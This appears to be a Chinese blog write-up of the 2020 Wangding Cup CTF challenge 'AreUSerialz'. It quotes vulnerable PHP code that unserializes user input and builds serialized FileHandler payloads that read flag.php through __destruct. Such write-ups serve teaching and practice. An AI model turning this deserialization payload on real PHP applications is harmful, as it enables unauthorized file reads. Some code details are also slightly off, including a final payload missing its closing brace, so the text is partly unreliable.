[网鼎杯 2020 青龙组]AreUSerialz1_开发测试

[网鼎杯 2020 青龙组]AreUSerialz1

创始人

2024-11-15 10:11:09

0次

打开题目

熟悉的php，代码审计

可知这是一题反序列化类型的题目。

按照常规方法，首先，我们先将代码复制到本地进行序列化构造，

根据代码逻辑分析，咱们可知 function __construct() {
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();
}

_destruct()析构函数当对象被销毁时会被自动调用；所以当反序列化函数调用时，会触发这个

分析此方法内的代码逻辑，当我们需要它正确输出flag时此魔术方法调用后会接着正确调用此对象中的process()方法和output()方法，所以write()方法也可以删除不用看， protected $content属性也可直接删了。

include("flag.php");
highlight_file(__FILE__);
class FileHandler {
protected $op;
protected $filename;
public function process() {
if($this->op == "1") {
$this->write();
} else if($this->op == "2") {
$res = $this->read();
$this->output($res);
} else {
$this->output("Bad Hacker!");
}
}
private function read() {
$res = "";
if(isset($this->filename)) {
$res = file_get_contents($this->filename);
}
return $res;
}

private function output($s) {
echo "[Result]:
";
echo $s;
}
function __destruct() {
if($this->op === "2")
$this->op = "1";
$this->process();
}
}
function is_valid($s) {
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}
if(isset($_GET{'str'})) {
$str = (string)$_GET['str'];
if(is_valid($str)) {
$obj = unserialize($str);
}
}

根据构造函数is_valid($s) 可知，

$s的值ASCII码范围得在32<=$s<=125；

再根据构造函数read()可知，

$filename值基本为flag.php

根据上述信息，构造第一个序列化值得到：

O:11:"FileHandler":3:{s:5:"*op";i:2;s:11:"*filename";s:8:"flag.php";s:10:"*content";N;}

php将属性类型换成public

include("flag.php");
highlight_file(__FILE__);
class FileHandler {
public $op=2;
public $filename="flag.php";
}
O:11:"FileHandler":2:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";

上一篇：对链表进行插入排序 - 力扣（LeetCode）C语言

下一篇：月薪竟然高达60k，AI大模型凭什么？

[网鼎杯 2020 青龙组]AreUSerialz1

相关内容

热门资讯